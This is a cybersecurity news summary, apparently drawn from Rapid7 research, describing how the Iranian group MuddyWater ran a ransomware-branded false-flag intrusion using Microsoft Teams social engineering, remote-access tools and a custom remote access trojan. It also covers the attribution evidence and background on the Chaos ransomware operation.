Concise Cyber

Subscribe below for free to get these delivered straight to your inbox

Advertisements
MuddyWater Abuses Microsoft Teams in False Flag Ransomware Attack to Steal Credentials
Advertisements

The Iranian state-sponsored threat group known as MuddyWater has been linked to a ransomware-related intrusion that researchers say was designed to look like a typical criminal extortion campaign. According to Rapid7, the attack observed in early 2026 used Microsoft Teams for social engineering, credential harvesting, and multi-factor authentication manipulation before shifting into data theft and persistence rather than traditional file encryption.

The incident has been described as a false flag operation because it initially resembled activity associated with a ransomware-as-a-service group operating under the Chaos brand. However, the evidence collected by researchers points to a targeted operation that used ransomware branding and tactics as cover while serving a broader strategic objective.

Microsoft Teams Used as the Entry Point

Rapid7 said the campaign began with a high-touch social engineering phase conducted through Microsoft Teams. The attackers initiated external chat requests and used interactive screen-sharing sessions to gain trust, obtain credentials, and interfere with MFA. In at least one instance, they instructed users to enter credentials into locally created text files.

Once access was obtained, the attackers did not follow a standard ransomware playbook. Instead of immediately encrypting files, they focused on deeper access, reconnaissance, and persistence inside the victim environment. The investigation found that they used compromised user accounts to move through the network and expand their foothold.

Persistence, Remote Access, and Data Theft

Rapid7 reported that the intruders used remote management tools such as DWAgent and AnyDesk to maintain access. They also used RDP to download an executable named ms_upd.exe from an external server using the curl utility. After execution, the binary triggered a multi-stage infection chain that delivered additional components.

The campaign involved:

  • ms_upd.exe (also called Stagecomp), which gathered system information and contacted a command-and-control server
  • game.exe (also called Darkcomp), a bespoke remote access trojan masquerading as a legitimate Microsoft WebView2 application
  • WebView2Loader.dll, a legitimate DLL required by Microsoft Edge WebView2
  • visualwincomp.txt, an encrypted configuration used by the RAT to retrieve C2 information

The RAT was designed to poll for new commands every 60 seconds. It could run commands or PowerShell scripts, perform file operations, and spawn an interactive cmd.exe shell or PowerShell. Rapid7 also said the victim was later contacted by email for ransom negotiations.

Why Researchers Linked the Attack to MuddyWater

The attribution to MuddyWater was supported in part by the use of a code-signing certificate attributed to Donald Gay to sign ms_upd.exe. According to the report, the same certificate had previously been used by the group to sign other malware, including a CastleLoader downloader called Fakeset.

Researchers said the campaign fits a pattern in which MuddyWater increasingly relies on off-the-shelf tools from the cybercrime underground to obscure attribution. That approach has also been noted in recent reporting by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC, including references to CastleRAT and Tsundere.

Connection to Earlier MuddyWater Operations

This is not the first time MuddyWater has been associated with ransomware-themed activity. In September 2020, the group was tied to a campaign against prominent Israeli organizations that used a loader called PowGoop to deploy a variant of Thanos ransomware with destructive capabilities. In 2023, Microsoft said MuddyWater worked with DEV-1084, a threat actor linked to the DarkBit persona, in destructive attacks under the guise of ransomware deployment. More recently, in October 2025, the attackers were believed to have used Qilin ransomware in an attack on an Israeli government hospital.

Check Point said in March that the operators appeared to be Iranian-affiliated actors using the cybercriminal ecosystem, a criminal ransomware brand, and methods associated with extortion to support a strategic objective. The company noted that use of Qilin and participation in its affiliate program may have provided cover and operational value. The root cause of the intrusion has not been confirmed beyond the social engineering and access methods described by researchers.

What the Chaos Brand Signaled

Rapid7’s analysis also highlighted the wider ransomware environment around the Chaos brand. Chaos emerged in early 2025 and is known for a double extortion model. Its affiliate program has been advertised on cybercrime forums such as RAMP and RehubCom. The group has used mail flooding and vishing through Teams, often by impersonating IT support staff, to push victims to install remote access tools like Microsoft Quick Assist.

Rapid7 said Chaos affiliates have also used triple extortion by threatening DDoS attacks, and in some cases quadruple extortion by threatening to contact customers or competitors. As of late March 2026, Chaos had claimed 36 victims on its data leak site, with most located in the U.S. Construction, manufacturing, and business services were among the prominent sectors targeted.

Conclusion

Rapid7’s findings show how MuddyWater blended state-backed intrusion methods with criminal-style ransomware tactics to disguise its activity. By using Microsoft Teams, remote management tools, and malware that mimicked legitimate software, the group appears to have aimed for credential theft, persistence, and data exfiltration rather than straightforward encryption.

All articles are written here with the help of AI on the basis of openly available information which cannot be independently verified. We do strive to quote the relevant sources.The intent is only to summarise what is already reported in public forum in our own wordswith no intention to plagarise or copy other person’s work.The publisher has no intent to defame or cause offence to anyone, any person or any organisation at any moment.The publisher assumes no responsibility for any damage or loss caused by making decisions on the basis of whatever is published on cyberconcise.com.You’re advised to do your own checks and balances before making any decision, and owners and publishers at cyberconcise.com cannot be held accountable for its resulting ramifications.If you have any objections, concerns or point out anything factually incorrect, please reach out using the form on https://concisecyber.com/about/

Discover more from Concise Cyber

Subscribe now to keep reading and get access to the full archive.

Continue reading